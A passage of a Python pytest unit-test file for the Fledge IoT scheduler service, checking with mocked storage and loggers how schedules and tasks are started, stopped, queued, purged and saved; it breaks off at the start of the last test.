| 69,601 |
py
|
Python
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 69 |
2019-12-03T17:54:33.000Z
|
2022-03-13T07:05:23.000Z
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 125 |
2020-02-13T15:11:28.000Z
|
2022-03-29T14:42:36.000Z
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 24 |
2019-12-27T07:48:45.000Z
|
2022-03-13T07:05:28.000Z
|
# -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
import asyncio
import datetime
import uuid
import time
import json
from unittest.mock import MagicMock, call
import sys
import copy
import pytest
from fledge.services.core.scheduler.scheduler import Scheduler, AuditLogger, ConfigurationManager
from fledge.services.core.scheduler.entities import *
from fledge.services.core.scheduler.exceptions import *
from fledge.common.storage_client.storage_client import StorageClientAsync
__author__ = "Amarendra K Sinha"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
async def mock_task():
return ""
async def mock_process():
m = MagicMock()
m.pid = 9999
m.terminate = lambda: True
return m
@pytest.allure.feature("unit")
@pytest.allure.story("scheduler")
class TestScheduler:
async def scheduler_fixture(self, mocker):
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await mock_process()
else:
_rv = asyncio.ensure_future(mock_process())
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_paused', False)
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
mocker.patch.object(scheduler, '_wait_for_task_completion', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_terminate_child_processes')
mocker.patch.object(asyncio, 'create_subprocess_exec', return_value=_rv)
await scheduler._get_schedules()
schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
log_exception = mocker.patch.object(scheduler._logger, "exception")
log_error = mocker.patch.object(scheduler._logger, "error")
log_debug = mocker.patch.object(scheduler._logger, "debug")
log_info = mocker.patch.object(scheduler._logger, "info")
return scheduler, schedule, log_info, log_exception, log_error, log_debug
@pytest.mark.asyncio
async def test__resume_check_schedules(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
# WHEN
# Check IF part
mocker.patch.object(scheduler, '_scheduler_loop_sleep_task', asyncio.Task(asyncio.sleep(5)))
scheduler._resume_check_schedules()
# THEN
assert scheduler._check_processes_pending is False
# WHEN
# Check ELSE part
mocker.patch.object(scheduler, '_scheduler_loop_sleep_task', None)
scheduler._resume_check_schedules()
# THEN
assert scheduler._check_processes_pending is True
@pytest.mark.asyncio
async def test__wait_for_task_completion(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
mock_schedules = dict()
mock_schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
mock_schedules[mock_schedule.id] = mock_schedule
mock_task_process = scheduler._TaskProcess()
mock_task_processes = dict()
mock_task_process.process = await asyncio.create_subprocess_exec("sleep", ".1")
mock_task_process.schedule = mock_schedule
mock_task_id = uuid.uuid4()
mock_task_process.task_id = mock_task_id
mock_task_processes[mock_task_process.task_id] = mock_task_process
mock_schedule_executions = dict()
mock_schedule_execution = scheduler._ScheduleExecution()
mock_schedule_executions[mock_schedule.id] = mock_schedule_execution
mock_schedule_executions[mock_schedule.id].task_processes[mock_task_id] = mock_task_process
mocker.patch.object(scheduler, '_resume_check_schedules')
mocker.patch.object(scheduler, '_schedule_next_task')
mocker.patch.multiple(scheduler, _schedules=mock_schedules,
_task_processes=mock_task_processes,
_schedule_executions=mock_schedule_executions)
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
# WHEN
await scheduler._wait_for_task_completion(mock_task_process)
# THEN
# After task completion, sleep above, no task processes should be left pending
assert 0 == len(scheduler._task_processes)
assert 0 == len(scheduler._schedule_executions[mock_schedule.id].task_processes)
args, kwargs = log_info.call_args_list[0]
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test__start_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# Assert that there is no task queued for mock_schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await mock_process()
else:
_rv = asyncio.ensure_future(mock_process())
mocker.patch.object(asyncio, 'create_subprocess_exec', return_value=_rv)
mocker.patch.object(asyncio, 'ensure_future', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_resume_check_schedules')
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
mocker.patch.object(scheduler, '_wait_for_task_completion')
# Confirm that task has not started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
# WHEN
await scheduler._start_task(schedule)
# THEN
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
assert 1 == log_info.call_count
# assert call("Queued schedule '%s' for execution", 'OMF to PI north') == log_info.call_args_list[0]
args, kwargs = log_info.call_args_list[0]
assert "Process started: Schedule '%s' process '%s' task %s pid %s, %s running tasks\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test_purge_tasks(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.multiple(scheduler, _ready=True, _paused=False)
mocker.patch.object(scheduler, '_max_completed_task_age', datetime.datetime.now())
# WHEN
await scheduler.purge_tasks()
# THEN
assert scheduler._purge_tasks_task is None
assert scheduler._last_task_purge_time is not None
@pytest.mark.asyncio
async def test__check_purge_tasks(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.multiple(scheduler, _purge_tasks_task=None,
_last_task_purge_time=None)
mocker.patch.object(scheduler, 'purge_tasks', return_value=asyncio.ensure_future(mock_task()))
# WHEN
scheduler._check_purge_tasks()
# THEN
assert scheduler._purge_tasks_task is not None
@pytest.mark.asyncio
async def test__check_schedules(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_start_task', return_value=asyncio.ensure_future(mock_task()))
# WHEN
earliest_start_time = await scheduler._check_schedules()
# THEN
assert earliest_start_time is not None
assert 3 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
@pytest.mark.asyncio
@pytest.mark.skip("_scheduler_loop() not suitable for unit testing. Will be tested during System tests.")
async def test__scheduler_loop(self, mocker):
pass
@pytest.mark.asyncio
async def test__schedule_next_timed_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
time_before_call = sch_execution.next_start_time
# WHEN
next_dt = datetime.datetime.fromtimestamp(sch_execution.next_start_time)
next_dt += datetime.timedelta(seconds=sch.repeat_seconds)
scheduler._schedule_next_timed_task(sch, sch_execution, next_dt)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time_before_call
assert 3 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
@pytest.mark.asyncio
async def test__schedule_next_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time-3600)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
time_before_call = sch_execution.next_start_time
# WHEN
scheduler._schedule_next_task(sch)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time_before_call
assert 4 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
args3, kwargs3 = log_info.call_args_list[3]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
# As part of scheduler._get_schedules(), scheduler._schedule_first_task() also gets executed, hence
# "stat collector" appears twice in this list.
assert 'stats collection' in args3
@pytest.mark.asyncio
async def test__schedule_first_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
curr_time = datetime.datetime.fromtimestamp(current_time)
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
# WHEN
scheduler._schedule_first_task(sch, current_time)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time.mktime(curr_time.timetuple())
assert 4 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
args3, kwargs3 = log_info.call_args_list[3]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
# As part of scheduler._get_schedules(), scheduler._schedule_first_task() also gets executed, hence
# "stat collector" appears twice in this list.
assert 'stats collection' in args3
@pytest.mark.asyncio
async def test__get_process_scripts(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
# WHEN
await scheduler._get_process_scripts()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
@pytest.mark.asyncio
async def test__get_process_scripts_exception(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug", side_effect=Exception())
log_exception = mocker.patch.object(scheduler._logger, "exception")
# WHEN
# THEN
with pytest.raises(Exception):
await scheduler._get_process_scripts()
log_args = 'Query failed: %s', 'scheduled_processes'
log_exception.assert_called_once_with(*log_args)
@pytest.mark.asyncio
@pytest.mark.parametrize("test_interval, is_exception", [
('"Blah" 0 days', True),
('12:30:11', False),
('0 day 12:30:11', False),
('1 day 12:40:11', False),
('2 days', True),
('2 days 00:00:59', False),
('00:25:61', True)
])
async def test__get_schedules(self, test_interval, is_exception, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
log_exception = mocker.patch.object(scheduler._logger, "exception")
new_schedules = copy.deepcopy(MockStorageAsync.schedules)
new_schedules[5]['schedule_interval'] = test_interval
mocker.patch.object(MockStorageAsync, 'schedules', new_schedules)
# WHEN
# THEN
if is_exception is True:
with pytest.raises(Exception):
await scheduler._get_schedules()
assert 1 == log_exception.call_count
else:
await scheduler._get_schedules()
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
@pytest.mark.asyncio
async def test__get_schedules_exception(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug", side_effect=Exception())
log_exception = mocker.patch.object(scheduler._logger, "exception")
mocker.patch.object(scheduler, '_schedule_first_task', side_effect=Exception())
# WHEN
# THEN
with pytest.raises(Exception):
await scheduler._get_schedules()
log_args = 'Query failed: %s', 'schedules'
log_exception.assert_called_once_with(*log_args)
@pytest.mark.asyncio
async def test__read_storage(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
# WHEN
await scheduler._read_storage()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
@pytest.mark.asyncio
@pytest.mark.skip("_mark_tasks_interrupted() not implemented in main Scheduler class.")
async def test__mark_tasks_interrupted(self, mocker):
pass
@pytest.mark.asyncio
async def test__read_config(self, mocker):
async def get_cat():
return {
"max_running_tasks": {
"description": "The maximum number of tasks that can be running at any given time",
"type": "integer",
"default": str(Scheduler._DEFAULT_MAX_RUNNING_TASKS),
"value": str(Scheduler._DEFAULT_MAX_RUNNING_TASKS)
},
"max_completed_task_age_days": {
"description": "The maximum age, in days (based on the start time), for a rows "
"in the tasks table that do not have a status of running",
"type": "integer",
"default": str(Scheduler._DEFAULT_MAX_COMPLETED_TASK_AGE_DAYS),
"value": str(Scheduler._DEFAULT_MAX_COMPLETED_TASK_AGE_DAYS)
},
}
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await get_cat()
else:
_rv = asyncio.ensure_future(get_cat())
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
cr_cat = mocker.patch.object(ConfigurationManager, "create_category", return_value=asyncio.ensure_future(mock_task()))
get_cat = mocker.patch.object(ConfigurationManager, "get_category_all_items", return_value=_rv)
# WHEN
assert scheduler._max_running_tasks is None
assert scheduler._max_completed_task_age is None
await scheduler._read_config()
# THEN
assert 1 == cr_cat.call_count
assert 1 == get_cat.call_count
assert scheduler._max_running_tasks is not None
assert scheduler._max_completed_task_age is not None
@pytest.mark.asyncio
async def test_start(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug")
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_scheduler_loop', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.multiple(scheduler, _core_management_port=9999,
_core_management_host="0.0.0.0",
current_time=current_time - 3600)
# TODO: Remove after implementation of above test test__read_config()
mocker.patch.object(scheduler, '_read_config', return_value=asyncio.ensure_future(mock_task()))
assert scheduler._ready is False
# WHEN
await scheduler.start()
# THEN
assert scheduler._ready is True
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
calls = [call('Starting'),
call('Starting Scheduler: Management port received is %d', 9999)]
log_info.assert_has_calls(calls, any_order=True)
calls = [call('Database command: %s', 'scheduled_processes'),
call('Database command: %s', 'schedules')]
log_debug.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_stop(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
log_exception = mocker.patch.object(scheduler._logger, "exception")
mocker.patch.object(scheduler, '_scheduler_loop', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_resume_check_schedules', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_purge_tasks_task', return_value=asyncio.ensure_future(asyncio.sleep(.1)))
mocker.patch.object(scheduler, '_scheduler_loop_task', return_value=asyncio.ensure_future(asyncio.sleep(.1)))
current_time = time.time()
mocker.patch.multiple(scheduler, _core_management_port=9999,
_core_management_host="0.0.0.0",
_start_time=current_time - 3600,
_paused=False,
_task_processes={})
# WHEN
retval = await scheduler.stop()
# THEN
assert retval is True
assert scheduler._schedule_executions is None
assert scheduler._task_processes is None
assert scheduler._schedules is None
assert scheduler._process_scripts is None
assert scheduler._ready is False
assert scheduler._paused is False
assert scheduler._start_time is None
calls = [call('Processing stop request'), call('Stopped')]
log_info.assert_has_calls(calls, any_order=True)
# TODO: Find why these exceptions are being raised despite mocking _purge_tasks_task, _scheduler_loop_task
calls = [call('An exception was raised by Scheduler._purge_tasks %s', "object MagicMock can't be used in 'await' expression"),
call('An exception was raised by Scheduler._scheduler_loop %s', "object MagicMock can't be used in 'await' expression")]
log_exception.assert_has_calls(calls)
@pytest.mark.asyncio
async def test_get_scheduled_processes(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
await scheduler._get_process_scripts()
mocker.patch.object(scheduler, '_ready', True)
# WHEN
processes = await scheduler.get_scheduled_processes()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(processes)
@pytest.mark.asyncio
async def test_schedule_row_to_schedule(self, mocker):
# GIVEN
scheduler = Scheduler()
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=10,
repeat_seconds=10,
exclusive=False,
enabled=True,
process_name='TestProcess')
# WHEN
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# THEN
assert isinstance(schedule, Schedule)
assert schedule.schedule_id == schedule_row[0]
assert schedule.name == schedule_row[1]
assert schedule.schedule_type == schedule_row[2]
assert schedule_row[3] is 0 # 0 for Interval Schedule
assert schedule_row[4] is 0 # 0 for Interval Schedule
assert schedule.repeat == schedule_row[5]
assert schedule.exclusive == schedule_row[7]
assert schedule.enabled == schedule_row[8]
assert schedule.process_name == schedule_row[9]
@pytest.mark.asyncio
async def test_get_schedules(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
schedules = await scheduler.get_schedules()
# THEN
assert len(scheduler._storage_async.schedules) == len(schedules)
@pytest.mark.asyncio
async def test_get_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.UUID("cea17db8-6ccc-11e7-907b-a6006ad3dba0") # purge schedule
# WHEN
schedule = await scheduler.get_schedule(schedule_id)
# THEN
assert isinstance(schedule, Schedule)
assert schedule.schedule_id == schedule_id
assert schedule.name == "purge"
assert schedule.schedule_type == Schedule.Type.MANUAL
assert schedule.repeat == datetime.timedelta(0, 3600)
assert schedule.exclusive is True
assert schedule.enabled is True
assert schedule.process_name == "purge"
@pytest.mark.asyncio
async def test_get_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.uuid4()
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError):
schedule = await scheduler.get_schedule(schedule_id)
@pytest.mark.asyncio
async def test_save_schedule_new(self, mocker):
@asyncio.coroutine
def mock_coro():
return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# WHEN
await scheduler.save_schedule(schedule)
# THEN
assert len(scheduler._storage_async.schedules) + 1 == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls =[call('SCHAD', {'schedule': {'name': 'Test Schedule', 'processName': 'TestProcess',
'type': Schedule.Type.INTERVAL, 'repeat': 30.0, 'enabled': True,
'exclusive': False}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 0 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_new_with_enable_modified(self, mocker):
@asyncio.coroutine
def mock_coro():
return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=True)
# THEN
assert len(scheduler._storage_async.schedules) + 1 == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls =[call('SCHAD', {'schedule': {'name': 'Test Schedule', 'processName': 'TestProcess',
'type': Schedule.Type.INTERVAL, 'repeat': 30.0, 'enabled': True,
'exclusive': False}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 1 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=False)
# THEN
assert 1 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_update(self, mocker):
@asyncio.coroutine
def mock_coro():
return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
schedule_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=1,
time=datetime.time(),
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
# WHEN
await scheduler.save_schedule(schedule)
# THEN
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'Test Schedule', 'enabled': True, 'repeat': 30.0,
'exclusive': False, 'day': 1, 'time': '0:0:0',
'processName': 'TestProcess', 'type': Schedule.Type.TIMED}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 0 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_update_with_enable_modified(self, mocker):
@asyncio.coroutine
def mock_coro():
return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
schedule_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=1,
time=datetime.time(),
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=True)
# THEN
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'Test Schedule', 'enabled': True, 'repeat': 30.0,
'exclusive': False, 'day': 1, 'time': '0:0:0',
'processName': 'TestProcess', 'type': Schedule.Type.TIMED}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 1 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=False)
# THEN
assert 1 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.uuid4()
